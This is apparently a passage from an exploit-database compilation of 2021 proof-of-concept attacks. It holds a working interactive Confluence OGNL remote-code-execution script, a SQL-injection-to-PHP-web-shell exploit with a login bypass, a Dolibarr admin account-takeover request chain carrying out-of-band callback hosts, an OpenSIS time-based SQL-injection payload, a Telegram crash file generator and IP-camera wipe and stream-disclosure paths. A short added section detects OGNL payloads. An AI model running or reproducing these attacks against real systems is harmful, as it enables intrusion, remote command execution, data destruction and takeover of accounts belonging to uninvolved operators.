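    """Highest role granted by the wp_capabilities meta, as WordPress reads it."""
    caps = user.get("wp_capabilities")
    if isinstance(caps, dict):
        for role in ("administrator", "editor", "author", "contributor", "subscriber"):
            if caps.get(role) in ("1", "true", True):
                return role
    return "none"


if __name__ == "__main__":
    # Constructed body mirroring the curl request in the advisory.
    body = "reg_username=numan&reg_password=numan&wp_capabilities[administrator]=1&action=pp_ajax_signup"
    form = parse_php_form(body)
    print(effective_role(build_new_user_vulnerable(form)))  # administrator
    print(effective_role(build_new_user_fixed(form)))       # subscriber
```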
-
Confluence Server 7.12.4 - 'OGNL injection' Remote Code Execution (RCE) (Unauthenticated)
# Exploit Title: Confluence Server 7.12.4 - 'OGNL injection' Remote Code Execution (RCE) (Unauthenticated)
# Date: 01/09/2021
# Exploit Author: h3v0x
# Vendor Homepage: https://www.atlassian.com/
# Software Link: https://www.atlassian.com/software/confluence/download-archives
# Version: All < 7.12.x versions before 7.12.5
# Tested on: Linux Distros
# CVE : CVE-2021-26084

#!/usr/bin/python3
# References:
# https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html
# https://github.com/httpvoid/writeups/blob/main/Confluence-RCE.md

import requests
from bs4 import BeautifulSoup
import optparse

parser = optparse.OptionParser()
parser.add_option('-u', '--url', action="store", dest="url", help="Base target host: http://confluencexxx.com")
parser.add_option('-p', '--path', action="store", dest="path", help="Path to exploitation: /pages/createpage-entervariables.action?SpaceKey=x")
options, args = parser.parse_args()

session = requests.Session()
url_vuln = options.url
endpoint = options.path

if not options.url or not options.path:
    print('[+] Specify an url target')
    print('[+] Example usage: exploit.py -u http://xxxxx.com -p /pages/createpage-entervariables.action?SpaceKey=x')
    print('[+] Example help usage: exploit.py -h')
    exit()


def banner():
    print('---------------------------------------------------------------')
    print('[-] Confluence Server Webwork OGNL injection')
    print('[-] CVE-2021-26084')
    print('[-] https://github.com/h3v0x')
    print('--------------------------------------------------------------- \n')


def cmdExec():
    while True:
        cmd = input('> ')
        xpl_url = url_vuln + endpoint
        xpl_headers = {"User-Agent": "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36",
                       "Connection": "close",
                       "Content-Type": "application/x-www-form-urlencoded",
                       "Accept-Encoding": "gzip, deflate"}
        # queryString is evaluated as OGNL. Quotes and the word "eval" are written as
        # \uXXXX escapes so the expression gets past the server-side keyword check; the
        # JavaScript run through the ScriptEngine executes cmd and collects its output,
        # which Confluence reflects back in the hidden queryString input.
        xpl_data = {"queryString": "aaaaaaaa\\u0027+{Class.forName(\\u0027javax.script.ScriptEngineManager\\u0027).newInstance().getEngineByName(\\u0027JavaScript\\u0027).\\u0065val(\\u0027var isWin = java.lang.System.getProperty(\\u0022os.name\\u0022).toLowerCase().contains(\\u0022win\\u0022); var cmd = new java.lang.String(\\u0022"+cmd+"\\u0022);var p = new java.lang.ProcessBuilder(); if(isWin){p.command(\\u0022cmd.exe\\u0022, \\u0022/c\\u0022, cmd); } else{p.command(\\u0022bash\\u0022, \\u0022-c\\u0022, cmd); }p.redirectErrorStream(true); var process= p.start(); var inputStreamReader = new java.io.InputStreamReader(process.getInputStream()); var bufferedReader = new java.io.BufferedReader(inputStreamReader); var line = \\u0022\\u0022; var output = \\u0022\\u0022; while((line = bufferedReader.readLine()) != null){output = output + line + java.lang.Character.toString(10); }\\u0027)}+\\u0027"}
        rawHTML = session.post(xpl_url, headers=xpl_headers, data=xpl_data)
        soup = BeautifulSoup(rawHTML.text, 'html.parser')
        field = soup.find('input', attrs={'name': 'queryString', 'type': 'hidden'})
        if field is None:
            print('[-] queryString field not found in the response; target may not be vulnerable')
            continue
        print(field['value'])


banner()
cmdExec()
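The payload above hides every quote and the word "eval" behind \uXXXX escapes, so a signature that looks for eval( or quotes in the raw request body never fires. The block below is an added detection example, not part of the advisory: it percent-decodes the body, collapses Java/OGNL unicode escapes (including nested ones such as \u005cu0027) and only then matches a small indicator list, run over constructed sample bodies. The indicator list is an assumption, not a vendor signature.

```python
# Added detection example (not from the advisory): normalise OGNL \uXXXX
# escapes and percent-encoding before matching CVE-2021-26084-style payloads.
import re
from urllib.parse import unquote_plus

_UNICODE_ESC = re.compile(r"\\u([0-9a-fA-F]{4})")

# Assumed indicator list for this demo.
OGNL_INDICATORS = (
    r"Class\.forName\(",
    r"ScriptEngineManager",
    r"getEngineByName\(",
    r"\beval\(",
    r"ProcessBuilder",
    r"Runtime\.getRuntime\(",
    r"@[\w.]+@",          # OGNL static member access, e.g. @java.lang.Runtime@getRuntime()
)
_INDICATOR_RE = re.compile("|".join(OGNL_INDICATORS))


def normalize(body: str) -> str:
    """Percent-decode twice (double-encoded bodies) and then collapse \\uXXXX
    escapes until none are left, so \\u005cu0027 -> \\u0027 -> '."""
    text = unquote_plus(unquote_plus(body))
    previous = None
    while previous != text:
        previous = text
        text = _UNICODE_ESC.sub(lambda m: chr(int(m.group(1), 16)), text)
    return text


def find_ognl_indicators(body: str, decode: bool = True) -> list:
    """Distinct indicator strings present in the body. decode=False is the
    naive match on the raw request that the escapes are designed to defeat."""
    text = normalize(body) if decode else body
    return sorted({m.group(0) for m in _INDICATOR_RE.finditer(text)})


# Constructed sample request bodies (not captured traffic).
SAMPLE_BODIES = {
    "benign": "queryString=hello+world&fromPage=index",
    "plain": "queryString=aaaa'%2B%7BClass.forName('javax.script.ScriptEngineManager')%7D",
    "escaped": ("queryString=aaaa%5Cu0027%2B%7BClass.forName(%5Cu0027javax.script.ScriptEngineManager%5Cu0027)"
                ".newInstance().getEngineByName(%5Cu0027JavaScript%5Cu0027).%5Cu0065val(%5Cu0027x%5Cu0027)%7D%2B%5Cu0027"),
}


def scan(bodies=SAMPLE_BODIES) -> dict:
    return {name: find_ognl_indicators(body) for name, body in bodies.items()}


if __name__ == "__main__":
    for name, hits in scan().items():
        print(f"{name:8s} decoded={hits} raw={find_ognl_indicators(SAMPLE_BODIES[name], decode=False)}")
```

Decoding before matching is the general rule for any expression-language injection: the transport layer (URL encoding) and the language's own escape syntax both have to be undone, and the loop handles escapes that decode into further escapes.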
-
Traffic Offense Management System 1.0 - Remote Code Execution (RCE) (Unauthenticated)
# Exploit Title: Traffic Offense Management System 1.0 - SQLi to Remote Code Execution (RCE) (Unauthenticated)
# Date: 19.08.2021
# Exploit Author: Tagoletta (Tağmaç)
# Software Link: https://www.sourcecodester.com/php/14909/online-traffic-offense-management-system-php-free-source-code.html
# Version: 1.0
# Tested on: Linux

import requests
import random
import string
import json
from bs4 import BeautifulSoup

url = input("TARGET = ")
if not url.startswith('http://') and not url.startswith('https://'):
    url = "http://" + url
if not url.endswith('/'):
    url = url + "/"

# Minimal PHP web shell that the injection writes to disk
payload = "<?php if(isset($_GET['tago'])){ $cmd = ($_GET['tago']); system($cmd); die; } ?>"
let = string.ascii_lowercase
shellname = ''.join(random.choice(let) for i in range(15))

session = requests.session()

print("Login Bypass\n")
# Authentication bypass: the username is concatenated into the login query
request_url = url + "classes/Login.php?f=login"
post_data = {"username": "admin' or '1'='1'#", "password": ""}
bypassUser = session.post(request_url, data=post_data)
data = json.loads(bypassUser.text)
status = data["status"]

if status == "success":
    print("Finding first driver\n")
    getHTML = session.get(url + "admin/?page=drivers")
    getHTMLParser = BeautifulSoup(getHTML.text, 'html.parser')
    findFirstDriverID = getHTMLParser.find("a", {"class": "delete_data"}).get("data-id")
    print("Found first driver ID : " + findFirstDriverID)

    print("\nFinding path")
    # A stray quote in the id parameter makes PHP print a warning containing the
    # absolute path of the script; that gives the directory for INTO OUTFILE.
    findPath = session.get(url + "admin/?page=drivers/manage_driver&id=" + findFirstDriverID + '\'')
    findPath = findPath.text[findPath.text.index("<b>Warning</b>: ") + 17:findPath.text.index("</b> on line ")]
    findPath = findPath[findPath.index("<b>") + 3:len(findPath)]
    parser = findPath.split('\\')
    parser.pop()
    findPath = ""
    for find in parser:
        findPath += find + "/"
    print("\nFound Path : " + findPath)
    shellPath = findPath[findPath.index("admin/"):len(findPath)]

    # INTO OUTFILE writes the selected row to disk; the PHP payload is passed as a
    # hex literal in LINES TERMINATED BY so the URL needs no quotes around it.
    SQLtoRCE = "' LIMIT 0,1 INTO OUTFILE '#PATH#' LINES TERMINATED BY #PAYLOAD# -- -"
    SQLtoRCE = SQLtoRCE.replace("#PATH#", findPath + shellname + ".php")
    SQLtoRCE = SQLtoRCE.replace("#PAYLOAD#", "0x3" + payload.encode("utf-8").hex())

    print("\n\nShell Uploading...")
    session.get(url + "admin/?page=drivers/manage_driver&id=" + findFirstDriverID + SQLtoRCE)
    print("\nShell Path : " + url + shellPath + shellname + ".php")
    shellOutput = session.get(url + shellPath + shellname + ".php?tago=whoami")
    print("\n\nShell Output : " + shellOutput.text)
else:
    print("No bypass user")
-
WordPress Plugin Payments Plugin | GetPaid 2.4.6 - HTML Injection
# Exploit Title: WordPress Plugin Payments Plugin | GetPaid 2.4.6 - HTML Injection
# Date: 29/08/2021
# Exploit Author: Niraj Mahajan
# Software Link: https://wordpress.org/plugins/invoicing/
# Version: 2.4.6
# Tested on: Windows

Steps to Reproduce:
1. Install WordPress 5.8
2. Install and activate "WordPress Payments Plugin | GetPaid" version 2.4.6
3. Navigate to GetPaid > Payment Forms
4. Click "Add New" on the Payment Forms page
5. Add a title and click on "Billing Email"
6. The "Help Text" field is shown on the left-hand side
7. Put the HTML below into the "Help Text" field:
   <img src="https://www.pandasecurity.com/en/mediacenter/src/uploads/2019/07/pandasecurity-How-do-hackers-pick-their-targets.jpg" height="200px" width="200px">
8. The HTML is stored in the database unsanitised and rendered as markup: the image appears on the right-hand side.
-
Telegram Desktop 2.9.2 - Denial of Service (PoC)
# Exploit Title: Telegram Desktop 2.9.2 - Denial of Service (PoC)
# Exploit Author: Aryan Chehreghani
# Date: 2021-08-30
# Vendor Homepage: https://telegram.org
# Software Link: https://telegram.org/dl/desktop/win64
# Tested Version: 2.9.2 x64
# Tested on OS: Windows 10 Enterprise

# [ About App ]
# Telegram is a messaging app with a focus on speed and security; it is fast, simple and free.
# You can use Telegram on all your devices at the same time: messages sync across any number of phones, tablets or computers.
# Telegram has over 500 million monthly active users and is one of the 10 most downloaded apps in the world.
# With Telegram you can send messages, photos, videos and files of any type (doc, zip, mp3, etc.), and create groups
# for up to 200,000 people or channels for broadcasting to unlimited audiences.
# You can write to your phone contacts and find people by their usernames. As a result, Telegram is like SMS and
# email combined and can take care of all your personal or business messaging needs.
# Telegram supports end-to-end encrypted voice and video calls, as well as voice chats in groups for thousands of participants.

# [ POC ]
# 1. Run the python script; it creates a new file "output.txt" containing 9,000,000 'A' characters
# 2. Run Telegram Desktop and go to "Saved Messages"
# 3. Copy the content of the file "output.txt"
# 4. Paste the content of "output.txt" into the "Write a message..." box
# 5. Crashed ;)

#!/usr/bin/env python
buffer = "\x41" * 9000000
try:
    f = open("output.txt", "w")
    print("[!] Creating %s bytes DOS payload...." % len(buffer))
    f.write(buffer)
    f.close()
    print("[!] File Created !")
except:
    print("File cannot be created")
-
Dolibarr ERP 14.0.1 - Privilege Escalation
# Exploit Title: Dolibarr ERP/CRM 14.0.1 - Privilege Escalation
# Date: April 8, 2021
# Exploit Author: Vishwaraj101
# Vendor Homepage: https://www.dolibarr.org/
# Affected Version: <= 14.0.1
# Patch: https://github.com/Dolibarr/dolibarr/commit/489cff46a37b04784d8e884af7fc2ad623bee17d

Summary:
Using the chain of issues below, an attacker can take over any Dolibarr user account, including the admin.

PoC:
1. Log in through the API as a test user with no (or minimal) permissions:
   https://example.com/api/index.php/login?login=demo&password=demo
2. The response contains an API token; it is sent as the DOLAPIKEY header below.
3. Fetch the user id of the account to take over. The admin's record, including its id, is returned by looking the user up by login name:

Request 1:

GET /api/index.php/users/login/admin HTTP/1.1
Host: preview2.dolibarr.org
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36 root@tqn9xk6rn6fq8x9ijbmpouosrjxan3srh.burpcollaborator.net
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DOLAPIKEY: test1337
Connection: close

This returns the user details for that login. Now update the victim account with the request below: send back the JSON body received from Request 1, with the email replaced by an attacker-controlled address.

Request 2:

PUT /api/index.php/users/12 HTTP/1.1
Host: preview2.dolibarr.org
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36 root@67bmexn44jw3paqv0o3257558wen5mwal.burpcollaborator.net
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DOLAPIKEY: test1337
Origin: https://preview2.dolibarr.org
Connection: close
Referer: http://5z5l6wf3wio2h9iusnv1x6x40v6mxkw8l.burpcollaborator.net/ref
Content-Length: 3221

{
  "id": "12", "statut": "1", "employee": "1", "civility_code": null, "gender": "woman",
  "birth": 495583200,
  "email": "[email protected]",
  "personal_email": "",
  "socialnetworks": {
    "facebook": "", "skype": "", "twitter": "", "linkedin": "", "instagram": "", "snapchat": "",
    "googleplus": "", "youtube": "", "whatsapp": "", "tumblr": "", "vero": "", "viadeo": "",
    "slack": "", "xing": "", "meetup": "", "pinterest": "", "flickr": "", "500px": "", "giphy": "",
    "gifycat": "", "dailymotion": "", "vimeo": "", "periscope": "", "twitch": "", "discord": "",
    "wikipedia": "", "reddit": "", "quora": "", "tripadvisor": "", "mastodon": "", "diaspora": "",
    "viber": ""
  },
  "job": "Admin Technical", "signature": "", "address": "", "zip": "", "town": "",
  "state_id": null, "state_code": null, "state": null,
  "office_phone": "", "office_fax": "", "user_mobile": "", "personal_mobile": "",
  "admin": "1", "login": "admin", "entity": "0",
  "datec": 1507187386, "datem": 1617819214,
  "socid": null, "contact_id": null, "fk_member": null, "fk_user": "11",
  "fk_user_expense_validator": null, "fk_user_holiday_validator": null,
  "clicktodial_url": null, "clicktodial_login": null, "clicktodial_poste": null,
  "datelastlogin": 1617816891, "datepreviouslogin": 1617815935,
  "datestartvalidity": "", "dateendvalidity": "",
  "photo": "com.jpg", "lang": "fr_FR",
  "rights": {"user": {"user": {}, "self": {}}},
  "conf": {}, "users": [], "parentof": null,
  "accountancy_code": "", "weeklyhours": "39.00000000", "color": "",
  "dateemployment": "", "dateemploymentend": "",
  "default_c_exp_tax_cat": null, "default_range": null, "fk_warehouse": null, "import_key": null,
  "array_options": [], "array_languages": null, "linkedObjectsIds": null, "canvas": null,
  "fk_project": null, "contact": null, "thirdparty": null, "user": null,
  "origin": null, "origin_id": null,
  "ref": "12", "ref_ext": null, "status": null,
  "country": null, "country_id": null, "country_code": "", "region_id": null,
  "barcode_type": null, "barcode_type_code": null, "barcode_type_label": null, "barcode_type_coder": null,
  "mode_reglement_id": null, "cond_reglement_id": null, "demand_reason_id": null, "transport_mode_id": null,
  "cond_reglement": null, "modelpdf": null, "last_main_doc": null, "fk_bank": null, "fk_account": null,
  "note_public": "", "note_private": "", "note": "",
  "name": null, "lastname": "Adminson", "firstname": "Alice", "civility_id": null,
  "date_creation": null, "date_validation": null, "date_modification": null,
  "specimen": 0, "alreadypaid": null, "liste_limit": 0
}

The API accepts this update even though the low-privilege token does not own user 12, so the admin's email is now attacker-controlled. Using the normal password-reset feature, the attacker then resets the admin password and gains access to the admin account.
-
OpenSIS Community 8.0 - 'cp_id_miss_attn' SQL Injection
# Exploit Title: OpenSIS Community 8.0 - 'cp_id_miss_attn' SQL Injection
# Date: 09/01/2021
# Exploit Author: Eric Salario
# Vendor Homepage: http://www.os4ed.com/
# Software Link: https://opensis.com/download
# Version: 8.0
# Tested on: Windows, Linux

A SQL injection vulnerability exists in the Take Attendance functionality of OS4Ed's OpenSIS 8.0 that allows an attacker to inject their own SQL query. The cp_id_miss_attn parameter of TakeAttendance.php is vulnerable. An attacker can trigger it with an authenticated HTTP request as a user with access to the "Take Attendance" functionality.

Steps to reproduce:
1. Log in as "Teacher", navigate to "Attendance" then "Take Attendance", and capture the request in a web proxy such as Burp Suite, or navigate directly to:
   http://localhost/Ajax.php?modname=users/TeacherPrograms.php?include=attendance/TakeAttendance.php&modfunc=attn&attn=miss&from_dasboard=1&date=Aug/9/2021&cp_id_miss_attn=27&cpv_id_miss_attn=23&ajax=true
   Vulnerable parameter: cp_id_miss_attn
   SQLi payload: r AND (SELECT 1670 FROM (SELECT(SLEEP(10)))VSpq)
   URL with the payload:
   http://localhost/Ajax.php?modname=users/TeacherPrograms.php?include=attendance/TakeAttendance.php&modfunc=attn&attn=miss&from_dasboard=1&date=Aug/9/2021&cp_id_miss_attn=r AND (SELECT 1670 FROM (SELECT(SLEEP(10)))VSpq)&cpv_id_miss_attn=23&ajax=true
2. The page load is delayed by the SLEEP value (10 seconds), which confirms the injection.

Manual queries can be used to dump database information, or use sqlmap.

PoC: https://youtu.be/GGHiPvdPRas
-
Compro Technology IP Camera - 'killps.cgi' Denial of Service (DoS)
# Exploit Title: Compro Technology IP Camera - 'killps.cgi' Denial-of-Service (DoS)
# Date: 2021-09-30
# Exploit Author: icekam,xiao13,Rainbow,tfsec
# Software Link: http://www.comprotech.com.hk/
# Version: Compro IP70 2.08_7130218, IP570 2.08_7130520, IP60, TN540
# CVE : CVE-2021-40378

The device ships with a built-in (backdoor) CGI script at the path below. Requesting it in the browser after logging in makes the device delete all of its data, including the camera's own data.

Payload: after logging in, visit /cgi-bin/support/killps.cgi

Please refer to: https://github.com/icekam/0day/blob/main/Compro-Technology-Camera-has-multiple-vulnerabilities.md
-
Compro Technology IP Camera - RTSP stream disclosure (Unauthenticated)
# Exploit Title: Compro Technology IP Camera - RTSP stream disclosure (Unauthenticated)
# Date: 2021-09-30
# Exploit Author: icekam,xiao13,Rainbow,tfsec
# Software Link: http://www.comprotech.com.hk/
# Version: Compro IP70 2.08_7130218, IP570 2.08_7130520, IP60, TN540
# CVE : CVE-2021-40379

Some devices allow unauthenticated access to RTSP, which leaks the surveillance video stream.

Payload: rtsp://.../medias2

Please refer to: https://github.com/icekam/0day/blob/main/Compro-Technology-Camera-has-multiple-vulnerabilities.md